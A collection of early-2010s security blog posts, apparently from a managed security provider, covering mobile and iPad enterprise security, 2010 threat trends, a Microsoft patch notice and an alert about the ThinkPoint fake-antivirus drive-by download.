3. Mobile: Veracode Announces Mobile App Security Scanning Service

Today, my friends at Veracode announced a new service for scanning mobile applications for security flaws. Veracode already scans apps for Windows Mobile (meh) and BlackBerry (ok, sure). Now, it is expanding to cover Android (in Q1) and iOS apps (in Q2). Targeting the hottest two smartphone platforms is smart, and I applaud them for their leadership in this area. Full disclosure: I used to work with many of the principals of Veracode at @stake. I count Chris Wysopal (Veracode’s CTO, formerly the artist known as Weld Pond), Christian Rioux (Chief Scientist, fka Dildog) and Chris Eng (Senior Director) as friends, and I wish them all the best with this exciting new service.

4. Mobile: Smartphones More Popular Than PCs

Today’s Financial Times reports that according to IDC, vendors shipped 101 million smartphones in the fourth quarter of 2010. Vendors shipped just 92 million PCs. What it means: Post-PC devices are now more popular than the venerable PCs they are running next to (or in some cases, replacing). Of course, my former employer Forrester Research predicted that this would happen nearly nine months ago, as I pointed out in a blog post from August of last year. Note that IDC’s numbers do not count the iPad in either category. If you count them in the “smartphone” bucket (as I do), the total is closer to 108 million Post-PC devices. What it means for customers: your security posture is going to change faster than you might think. As I pointed out in my previous post, securing the mobile devices on your network cannot be an afterthought — it needs to be your front-and-center priority for 2011. You should focus on applying sensible controls to protect your data.

That’s it for today. I hope you are enjoying your week. See you at RSA next week!

On the heels of the news that Apple CEO Steve Jobs was taking a medical leave of absence, the company announced its earnings after the close of the bell Tuesday. And even though Apple always sandbags its estimates, and even though it seems like we are used to seeing “Apple blows out its numbers” headlines every quarter, the announcement really was a blowout. The company announced record revenues, record profits ($6 billion), record shipments of Macs (4.1 million), record shipments of iPhones (16 million) and a gangbusters quarter for iPads (7.3 million). That might all seem abstract until you reflect that what this says about the changing mix of computing devices used by companies and by individuals:

• The iPad is replacing laptops for some customers. With shipments of over 7m in the last quarter, iPad sales are now a statistically relevant 7% of worldwide PC sales. Combine that with the observation that netbook sales are down by 30% year over year. The conclusion: the iPad is becoming not just an accessory device, but a replacement device for a lot of mobile computing tasks. Our CEO and Chairman of the Board both carry an iPad; in the Chairman’s case, it has replaced his laptop entirely. Apple’s quarter means this won’t be an unusual phenomenon for long.

• iOS is emerging as a major enterprise platform to be secured. Since the introduction of the iPhone, Apple has sold 160 million iPhones, iPads or iPod Touch devices. Put another way, Apple sold 160 million devices that are capable of accessing corporate e-mail. If you assume that 25% of these devices are used for work purposes, that means 40 million iOS devices that need to be properly secured. That is probably a conservative number: Apple told the Street that 88% of the Fortune 100 are deploying the iPhone in some way, and that 80% are piloting or supporting the iPad. The canonical example of this might be JP Morgan Chase, which announced in December 2010 that every employee in its investment banking division will receive an iPad.

There are a lot of pundits and security vendors that see the emergence of Apple as a non-traditional enterprise supplier as a sign of impending doom. McAfee believes that we’ll finally see an influx of Mac and iOS malware (despite the dearth of it in the past). Cisco says something similar. And so does Sophos (although that’s a drum they have been beating so long I’m surprised their arms haven’t fallen off).

Our view here at Perimeter is that all this talk about Apple malware is just a bright-and-shiny argument not dissimilar to the bright-and-shiny qualities of Apple products themselves. It’s hot air meant to scare customers and promote vendor products and ahem, “demonstrate thought leadership.” That’s fine, but customers should not be misled. The security issues with Apple devices are far less dramatic, and far more prosaic, than whether a sly programmer can slip malware past the App Store screeners. As an analyst at Forrester, I wrote extensively about why anti-malware software won’t be needed on Apple iPhone and iPad devices, due to core security features in iOS like code signing, mandatory access control (“sandboxing”) and trusted boot processes. Moreover, despite all of the screeching about potentially overly privileged applications that might or might not be beaming your contact list to Outer Mongolia, chatty apps aren’t a major issue either (at least not yet).

The real security issue that the increasingly omnipresent Apple devices force us to confront is much more basic. And it is related to what the devices are used for — getting email. Companies I speak with about mobile security issues want to make sure that their employees access e-mail and other company resources safely, and in accordance with standard security policies. That means:

• Automatically provisioning your e-mail accounts and global address books
• Encrypting traffic to and from e-mail servers
• Locking the device with a PIN or passcode, 6 digits at a minimum
• Setting a policy so that devices automatically lock themselves after 15 or 30 minutes of inactivity, and automatically erase themselves after excessive timeouts
• Activating the “remote wipe” feature that allows administrators to brick a device if it has been lost or stolen

In other words, the major security issue with Apple products is how to implement security controls, and not about repelling the wily hacker. The good news is that policy controls are not very hard or expensive to do — just configure your Microsoft Exchange server or Lotus Notes Traveler server to enforce the relevant security policies via ActiveSync. PerimeterUSA customers, for example, can implement iOS security features as a standard feature of our hosted Exchange service. Apple also provides the iPhone Configuration Utility that allows customers to generate policy files that can be distributed to air to iPhones and iPads.

So to sum up: what Apple’s blowout quarter means for security is three things, in the short term is this:

• It means that you will soon see a lot more Apple devices on your corporate networks
• It means you will need to configure these devices with sensible security policies, but that…
• …most of the things you need to do are straightforward, and can be done inexpensively

Over the longer term, the iPad in particular has interesting implications for security in addition to the e-mail, connectivity and configuration topics I’ve mentioned in this post. With the iPad, it’s all about the apps. I will write about that in a future post. In the meantime, good luck finding a fashionable case for your new device.

Last week I hosted a webinar called “5 Data Security Predictions for 2011.” The webinar was my first of many for Perimeter. It was lots of fun. I received some excellent questions from the audience. And I was gratified to see that we had several hundred registered attendees, too!

For those of you who couldn’t make the webinar, you can click on this link to view the replay. But if you are allergic to multimedia, I thought I’d summarize the topics I covered in the webinar here. Last week’s webinar had three goals:

• To take a look back at the key security trends from 2010
• To summarize the three most interesting security events of the last year, and the lessons we learned from them
• To predict five data security trends for 2011

This post covers the first item on the agenda: looking back at 2010.

2010: The Year of Living Dangerously

With many apologies to the actor formerly known as Mel Gibson, 2010 extended and deepened four trends we’ve seen in previous years. These should seem familiar to you, but there are a few twists that make them worthy of comment. In 2010, we observed:

• Multiplying threats. It should come as no surprise to astute security professionals that malware has continued to proliferate. As with previous years, the number of circulating malware samples increased, by some counts, by a factor of 10 over the previous year. McAfee, for example, estimates the the number of samples has exceeded 50 million. Other AV vendors have reported similar figures. The reason for the increases is simple: attackers are creating malware in smaller “batch sizes” (but with a larger number of batches) to evade detection by anti-virus engines. We are getting close to what I call “designer malware”: one signature, one victim. It’s not hard to understand why that strategy would work for the bad guys: if you can create unique malware for each victim, you can slide under the radar screen of the AV labs because the prevalence is nearly zero.  The low-and-slow attack vector for modern malware is a difficult challenge for everyone in the industry. And it is clearly successful. From Perimeter’s perspective as an MSSP, we have been tracking nearly 25 botnets that we’ve observed in action inside our customers’ networks. We expect to track more incursions in the future.
• Migration of malware to the web. Hand-in-hand with the explosion in malware samples is the change in attack tactics. Instead of mailing infected attachments to their intended victims, the bad guys are much more likely to send e-mails with hyperlinks in them, which they then induce the recipient to click on. When clicked on, the link leads to a site that dynamically generates “drive-by” malware that is custom-made for the victim. Again, this goes back to the “designer malware” comment in the previous bullet. Some of the vendors I’ve worked with in the past (like WebSense) have noted the movement of malware away from e-mail and towards the web. As an MSSP with content filtering services, we’ve noticed it too. What it means for our customers is that web content-filtering becomes a lot more important than it used to be. Keeping inbound web traffic free from malware becomes as critical for security (indeed, more so) than the outbound stuff. Never mind whether Johnny in Accounting is spending too much time on ESPN’s website — you should care just as much if he’s getting 0wned when he goes there.
• Mobile security fears. From the iPad to those newfangled Android devices, every enterprise I’ve spoken with is worried about what modern Post-PC devices will do to their security posture. The urgency stems from two sources. First, managers want to know how to apply security controls to consumer-grade gear being brought into the workplace by employees and executives. They want to know what kind of password and data protection policies they need, and how to apply them to gear that isn’t named BlackBerry. Second, companies have concerns about the iPad in particular, because of business initiatives outside IT. Both scenarios are equally important. You can read about my perspective on Apple devices in this Forrester report, which I wrote last summer, and in press accounts of it here and here.
• More compliance pressures. Compliance and security are often conflated, but it’s best to view the kinds of security activities enterprises do for compliance purposes as a kind of tax they have to pay to stay in business. And every year, the “tax rate” goes up. For example, with the passage of the HITECH provisions of the American Recovery and Reinvestment Act (ARRA) of 2009 (aka “the stimulus bill”), health care Covered Entities (hospitals and providers of medical care) and their Business Associates (insurers, and other partners) are subject to more stringent rules on what they must do to safeguard personal protected health information (PHI). For retailers, recent revisions to the Payment Card Industry’s Data Security Standard (PCI-DSS) means that businesses that accept and process credit cards must tighten up their wireless networks, manage their server log files better and audit their web-facing applications. And in the banking sector, new rules from FINRA around social media means that employers must monitor their employees’ use of Facebook and other outside websites.

All four of these trends are top-of-mind concerns for just about every security professional and CISO I speak with. What is most interesting for me, as an observer, student of security and CTO is the mix of concerns. Threats and compliance pressures are perennial concerns: they are always with us, and always need tending to. The attackers won’t stop brewing up increasingly lethal doses of malware for consumption by the unwitting, and the auditors won’t put down their clipboards. But the new evergreen issues on this list — mobile security, and the increased lethality of web content — could cause rapid shifts in company security postures very quickly if they aren’t dealt with. How we respond to these two issues is the key.

And on that note, we’re at a good breaking point for this post. The next posts will summarize what we learned from 2010′s three most interesting events, and offer predictions for  2011.

The market for tablet computers, which sputtered with an earlier generation of devices, is growing rapidly this time, thanks to Apple’s iPad. And it’s not just a consumer phenomenon, as doctors, lawyers, and other businesspeople adopt the iPad for a range of mobile applications.

James Gordon, VP of IT at Needham Bank, initially wondered if the iPad wasn’t merely a glorified iPhone. “The answer is yes–but it’s a really good glorified iPhone,” he says. In addition to providing iPads to senior executives at the bank, Gordon gave one to the committee responsible for checking on construction projects before releasing loans to builders, enabling that group to do more of its work from the field.

Gordon didn’t hesitate in approving the iPad for enterprise use, because the bank had already established device management and information security policies for the iPhone, which uses the same iOS operating system.

That’s a common uptake pattern, according to Dave Dahlberg, chief marketing officer at Model Metrics, which helps companies extend Salesforce.com applications for mobile use. Companies that already went through an enterprise evaluation of the iPhone are giving the iPad their stamp of approval in weeks, rather than the months it took for the iPhone.

Hyatt Hotels, Medtronic, and Wells Fargo are among the companies that have purchased iPads for some employees. SAP indicated it could buy as many as 17,000 of the devices.

Apple ignited this tablet excitement, but it won’t have the market to itself for long. Samsung and other manufacturers are selling the slim, portable devices based on Google’s Android operating system, Research In Motion is developing the BlackBerry Playbook, and Microsoft will be getting into the market, too. This generation of tablets tends to be smaller and lighter than before, with touch-screen rather than pen-based user interfaces, and daylong battery life.

So far, the iPad is the runaway favorite and the one building a track record within the enterprise. From a security perspective, the iPad even has some advantages, says Andrew Jaquith, CTO of Perimeter E-Security, a provider of managed security services. For example, whether through the Apple App Store or a corporate applications portal, the distribution of software is tightly controlled, so malicious software “is unlikely to be a problem the way it has been on the PC,” he says.

Many basic security concerns–the loss of data if a device is lost or stolen, for example–can be addressed with encryption, a remote wipe capability, and a policy mandating that data get wiped after four or five incorrect password attempts. If important information on the device is synchronized with an enterprise data store, such mishaps do little harm, he says.

In some cases, enterprise data is viewed on the device but not stored there, using a remote access utility and encrypted connection. Needham Bank, for example, uses Array Networks’ DesktopDirect for that purpose, while other companies we talked to employ Citrix Receiver. Beyond that, Jaquith sees a market opportunity for companies like Perimeter to provide managed security services for tablets.

The following table summarizes the November security bulletins that affect Microsoft Windows in order of severity.

Affected Software

^[1]The security updates for Microsoft Office 2004 for Mac, Microsoft Office 2008 for Mac, and Open XML File Format Converter for Mac are unavailable at this time.

To avoid being affected by these vulnerabilities, our security experts recommend installing the necessary update on your machines which can be found on the Microsoft website.

Here is the link for more information.
http://www.microsoft.com/technet/security/bulletin/ms10-087.mspx

The Perimeter Security Operations Center has recently discovered that upon visiting these sites you may be presented with either a fake Adobe Reader 8 Install prompt or a Microsoft Security Essentials “Infection Found” pop-up window.  Neither of these are legitimate.

This ad based drive-by download presents itself as ThinkPoint.  The file may use a legitimate name such as hotfix.exe or mstsc.exe and is saved to a temp directory.  It then picks out random files, claims they are infected and forces you to “clean” these false threats.  ThinkPoint will state that you need a heuristic program to fix the problems and offers to sell one for $99.90.  Do not purchase ThinkPoint; this program is fraudulent!

Anti-viruses may detect this as FakeAV, FakeAlert, or a generic Trojan.  A full list can be found here:

http://www.virustotal.com/file-scan/report.html?id=c049d274905ac80c9377e1cb0c291a5e67c33876ce256454db29dea953e44e4a-1287696527

There is a surprising lack of information about this trojan variant, considering how popular the sites are that are helping spread it.  We have found one reputable anti-virus vendor with insight:

http://www.f-secure.com/weblog/archives/00002053.html

For Perimeter’s ITC customers we have added a Null Route to blacklist the IP address of the domain actually serving the malware.  The advertising domain has also been submitted to Fortinet to be recategorized as Malware until this issue can be resolved by the primary domains using the advertisements.

For customers using Fortigate, additional steps of preventing this kind of infection include subscribing to Web Content Filtering while blocking the Advertising and Unrated categories, and subscribing to network anti-virus with download of Executables blocked.